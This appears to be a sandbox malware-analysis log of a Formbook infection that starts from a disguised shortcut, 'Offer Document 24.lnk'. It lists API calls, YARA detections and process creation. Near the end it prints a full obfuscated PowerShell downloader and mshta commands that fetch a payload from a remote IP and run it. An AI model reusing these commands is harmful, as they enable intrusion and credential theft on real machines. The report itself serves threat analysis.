Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3D10 NtOpenProcessToken, 7_2_015D3D10
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2D00 NtSetInformationFile, 7_2_015D2D00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2D30 NtUnmapViewOfSection, 7_2_015D2D30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2DD0 NtDelayExecution, 7_2_015D2DD0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2DB0 NtEnumerateKey, 7_2_015D2DB0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2C60 NtCreateKey, 7_2_015D2C60
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2C00 NtQueryInformationProcess, 7_2_015D2C00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2CC0 NtQueryVirtualMemory, 7_2_015D2CC0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2CF0 NtOpenProcess, 7_2_015D2CF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2CA0 NtQueryInformationToken, 7_2_015D2CA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2F60 NtCreateProcessEx, 7_2_015D2F60
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2F30 NtCreateSection, 7_2_015D2F30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2FE0 NtCreateFile, 7_2_015D2FE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2F90 NtProtectVirtualMemory, 7_2_015D2F90
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2FB0 NtResumeThread, 7_2_015D2FB0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2FA0 NtQuerySection, 7_2_015D2FA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2E30 NtWriteVirtualMemory, 7_2_015D2E30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2EE0 NtQueueApcThread, 7_2_015D2EE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2E80 NtReadVirtualMemory, 7_2_015D2E80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2EA0 NtAdjustPrivilegesToken, 7_2_015D2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F24340 NtSetContextThread,LdrInitializeThunk, 10_2_02F24340
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F24650 NtSuspendThread,LdrInitializeThunk, 10_2_02F24650
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F235C0 NtCreateMutant,LdrInitializeThunk, 10_2_02F235C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22AF0 NtWriteFile,LdrInitializeThunk, 10_2_02F22AF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22AD0 NtReadFile,LdrInitializeThunk, 10_2_02F22AD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_02F22BF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22BE0 NtQueryValueKey,LdrInitializeThunk, 10_2_02F22BE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22BA0 NtEnumerateValueKey,LdrInitializeThunk, 10_2_02F22BA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22B60 NtClose,LdrInitializeThunk, 10_2_02F22B60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F239B0 NtGetContextThread,LdrInitializeThunk, 10_2_02F239B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22EE0 NtQueueApcThread,LdrInitializeThunk, 10_2_02F22EE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22E80 NtReadVirtualMemory,LdrInitializeThunk, 10_2_02F22E80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22FE0 NtCreateFile,LdrInitializeThunk, 10_2_02F22FE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22FB0 NtResumeThread,LdrInitializeThunk, 10_2_02F22FB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22F30 NtCreateSection,LdrInitializeThunk, 10_2_02F22F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22CA0 NtQueryInformationToken,LdrInitializeThunk, 10_2_02F22CA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_02F22C70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22C60 NtCreateKey,LdrInitializeThunk, 10_2_02F22C60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_02F22DF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22DD0 NtDelayExecution,LdrInitializeThunk, 10_2_02F22DD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22D30 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_02F22D30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22D10 NtMapViewOfSection,LdrInitializeThunk, 10_2_02F22D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23090 NtSetValueKey, 10_2_02F23090
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23010 NtOpenDirectoryObject, 10_2_02F23010
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22AB0 NtWaitForSingleObject, 10_2_02F22AB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22B80 NtQueryInformationFile, 10_2_02F22B80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22EA0 NtAdjustPrivilegesToken, 10_2_02F22EA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22E30 NtWriteVirtualMemory, 10_2_02F22E30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22FA0 NtQuerySection, 10_2_02F22FA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22F90 NtProtectVirtualMemory, 10_2_02F22F90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22F60 NtCreateProcessEx, 10_2_02F22F60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22CF0 NtOpenProcess, 10_2_02F22CF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22CC0 NtQueryVirtualMemory, 10_2_02F22CC0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22C00 NtQueryInformationProcess, 10_2_02F22C00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22DB0 NtEnumerateKey, 10_2_02F22DB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23D70 NtOpenThread, 10_2_02F23D70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23D10 NtOpenProcessToken, 10_2_02F23D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22D00 NtSetInformationFile, 10_2_02F22D00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577A70 NtReadFile, 10_2_02577A70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577B50 NtDeleteFile, 10_2_02577B50
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577BE0 NtClose, 10_2_02577BE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577920 NtCreateFile, 10_2_02577920
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577D30 NtAllocateVirtualMemory, 10_2_02577D30
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4A34217E 5_2_00007FFB4A34217E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B28A0 7_2_009B28A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C6871 7_2_009C6871
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C6873 7_2_009C6873
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009BE1F3 7_2_009BE1F3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B1110 7_2_009B1110
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C0173 7_2_009C0173
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B1290 7_2_009B1290
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B3500 7_2_009B3500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B2698 7_2_009B2698
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B268A 7_2_009B268A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B26A0 7_2_009B26A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009BFF53 7_2_009BFF53
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009DD753 7_2_009DD753
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009BFF4A 7_2_009BFF4A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166B16B 7_2_0166B16B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D516C 7_2_015D516C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01590100 7_2_01590100
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016581CC 7_2_016581CC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016601AA 7_2_016601AA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AB1B0 7_2_015AB1B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165F0E0 7_2_0165F0E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016570E9 7_2_016570E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F0CC 7_2_0164F0CC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D34C 7_2_0158D34C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165A352 7_2_0165A352
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165132D 7_2_0165132D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016603E6 7_2_016603E6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E739A 7_2_015E739A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A52A0 7_2_015A52A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01657571 7_2_01657571
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163D5B0 7_2_0163D5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01660591 7_2_01660591
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01652446 7_2_01652446
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165F43F 7_2_0165F43F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164E4F6 7_2_0164E4F6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C4750 7_2_015C4750
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0770 7_2_015A0770
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159C7C0 7_2_0159C7C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165F7B0 7_2_0165F7B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016516CC 7_2_016516CC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BC6E0 7_2_015BC6E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A9950 7_2_015A9950
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB950 7_2_015BB950
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B6962 7_2_015B6962
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166A9A6 7_2_0166A9A6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A29A0 7_2_015A29A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A2840 7_2_015A2840
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AA840 7_2_015AA840
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D800 7_2_0160D800
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE8F0 7_2_015CE8F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A38E0 7_2_015A38E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015868B8 7_2_015868B8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FB76 7_2_0165FB76
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165AB40 7_2_0165AB40
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015DDBF9 7_2_015DDBF9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01656BD7 7_2_01656BD7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BFB80 7_2_015BFB80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01613A6C 7_2_01613A6C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01657A46 7_2_01657A46
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FA49 7_2_0165FA49
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164DAC6 7_2_0164DAC6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163DAAC 7_2_0163DAAC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159EA80 7_2_0159EA80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E5AA0 7_2_015E5AA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01657D73 7_2_01657D73
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A3D40 7_2_015A3D40
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01651D5A 7_2_01651D5A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AAD00 7_2_015AAD00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BFDC0 7_2_015BFDC0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159ADE0 7_2_0159ADE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B8DBF 7_2_015B8DBF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01619C32 7_2_01619C32
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0C00 7_2_015A0C00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FCF2 7_2_0165FCF2
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01590CF2 7_2_01590CF2
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640CB5 7_2_01640CB5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01614F40 7_2_01614F40
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FF09 7_2_0165FF09
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C0F30 7_2_015C0F30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E2F28 7_2_015E2F28
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592FC8 7_2_01592FC8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015ACFE0 7_2_015ACFE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1F92 7_2_015A1F92
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FFB1 7_2_0165FFB1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0E59 7_2_015A0E59
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165EE26 7_2_0165EE26
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165EEDB 7_2_0165EEDB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B2E90 7_2_015B2E90
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A9EB0 7_2_015A9EB0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 0160EA12 appears 86 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 0158B970 appears 268 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 015E7E54 appears 89 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 015D5130 appears 36 times
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: String function: 0161F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F37E54 appears 88 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02EDB970 appears 266 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F5EA12 appears 84 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F6F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 02F25130 appears 36 times
Source: rooma.exe.5.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7388, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: rooma.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rooma.exe.5.dr Static PE information: Section .text
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winLNK@14/15@17/14
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpkvo4uk.0pp.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: netbtugc.exe, 0000000A.00000002.3833651753.000000000295D000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3833651753.0000000002945000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3833651753.000000000295A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Offer Document 24.lnk ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://20.86.128.223/room/room4.hta'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" http://20.86.128.223/room/room4.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LQhlh($iAXOUnjQ, $bjGcHEb){[IO.File]::WriteAllBytes($iAXOUnjQ, $bjGcHEb)};function zkkoODnkdOXlr($iAXOUnjQ){if($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47179,47187,47187))) -eq $True){rundll32.exe $iAXOUnjQ }elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47191,47194,47128))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $iAXOUnjQ}elseif($iAXOUnjQ.EndsWith((KgQIevZJx @(47125,47188,47194,47184))) -eq $True){misexec /qn /i $iAXOUnjQ}else{Start-Process $iAXOUnjQ}};function fbUysIvJpUzDJbgt($WeuPtAwBrGuTyyLeSBEJ){$TPKepUYDmoAFjOHRfuEf = New-Object (KgQIevZJx @(47157,47180,47195,47125,47166,47180,47177,47146,47187,47184,47180,47189,47195));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$bjGcHEb = $TPKepUYDmoAFjOHRfuEf.DownloadData($WeuPtAwBrGuTyyLeSBEJ);return $bjGcHEb};function KgQIevZJx($eTHmOcKqIU){$kIWXaGUQZYbt=47079;$PDFpjjruzXwZezIX=$Null;foreach($QNJiuRDs in $eTHmOcKqIU){$PDFpjjruzXwZezIX+=[char]($QNJiuRDs-$kIWXaGUQZYbt)};return $PDFpjjruzXwZezIX};function iMoBwPUgEkDDhYs(){$bzNVNMxsa = $env:AppData + '\';$fLaod = $bzNVNMxsa + 'rooma.exe'; if (Test-Path -Path $fLaod){zkkoODnkdOXlr $fLaod;}Else{ $movKnuBo = fbUysIvJpUzDJbgt (KgQIevZJx @(47183,47195,47195,47191,47137,47126,47126,47129,47127,47125,47135,47133,47125,47128,47129,47135,47125,47129,47129,47130,47126,47193,47190,47190,47188,47126,47193,47190,47190,47188,47176,47125,47180,47199,47180));LQhlh $fLaod $movKnuBo;zkkoODnkdOXlr $fLaod;};;;;}iMoBwPUgEkDDhYs;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\rooma.exe "C:\Users\user\AppData\Roaming\rooma.exe"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
